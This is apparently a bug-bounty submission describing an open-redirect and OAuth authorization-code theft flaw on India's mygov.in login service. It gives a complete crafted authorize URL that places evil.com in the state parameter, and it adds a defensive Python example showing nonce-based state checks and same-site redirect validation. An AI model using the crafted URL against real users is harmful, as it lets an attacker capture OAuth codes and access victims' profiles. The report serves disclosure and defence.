
Open redirection with OAuth code stealing in the Indian government's mygov.in web app. The URL https://auth.mygov.in/oauth2/authorize?response_type=code&client_id=MyGovStartUpIndia&redirect_uri=http://api.startupindia.gov.in/sih/api/noauth/oauth2/code/recieve&scope=user_profile&state=https://evil.com/ will redirect a mygov.in user to evil.com after that user logs in with correct credentials. This makes the attack more effective because the attacker can redirect real users who have an account on mygov.in, and the attacker's site will also receive the OAuth code and, with it, access to the user's profile.
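As an added example (not part of this report, and not the code of either site involved), this is how an OAuth client's callback should treat the `state` value and the post-login destination so that a URL placed in `state` can never become a redirect target: `state` is a session-bound, single-use nonce, and the destination is taken from the client's own session and accepted only as a same-site path. All function and host names are hypothetical.

```python
import hmac
import secrets
from urllib.parse import urlparse


def new_login_state(session: dict) -> str:
    """Create an unguessable state nonce, store it in the session, return it.
    The nonce is the only thing that belongs in `state`; never a URL."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state


def state_is_valid(session: dict, presented) -> bool:
    """Constant-time, single-use check of the callback's `state` against the
    copy stored before the login started."""
    expected = session.pop("oauth_state", None)   # pop: a state is usable once
    if expected is None or not isinstance(presented, str):
        return False
    return hmac.compare_digest(expected, presented)


def safe_return_path(candidate) -> str:
    """Accept a post-login destination only if it is a plain same-site path.
    Absolute URLs, scheme-relative //host, /\\host, and control characters
    all fall back to '/'."""
    if not isinstance(candidate, str) or not candidate:
        return "/"
    if any(ch.isspace() or ord(ch) < 32 for ch in candidate):
        return "/"
    if not candidate.startswith("/") or candidate[1:2] in ("/", "\\"):
        return "/"
    parsed = urlparse(candidate)
    if parsed.scheme or parsed.netloc:
        return "/"
    return candidate


def handle_callback(session: dict, params: dict):
    """Decide what the authorization-code callback does.
    Returns (code_accepted, redirect_target). `params` is the parsed query
    string of the callback request (constructed by the caller)."""
    if not state_is_valid(session, params.get("state")):
        # Forged or replayed state: do not exchange the code, do not follow anything.
        return (False, "/")
    # The destination comes from our own session, never from the request.
    return (True, safe_return_path(session.pop("post_login_next", None)))
```

A request whose `state` is `https://evil.com/` fails `state_is_valid`, and even a stored destination of that form is reduced to `/` by `safe_return_path`.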

https://auth.mygov.in/



Event ID: 1181

Total Points = 320
Bug Type: Security
Status: open
Added on: Aug. 30, 2020, 6:38 a.m.
Submitted: Independently
Issues Reported: 1
Browser Version: 68.0
Operating System: Linux
OS Version: Unknown

Comments (0)
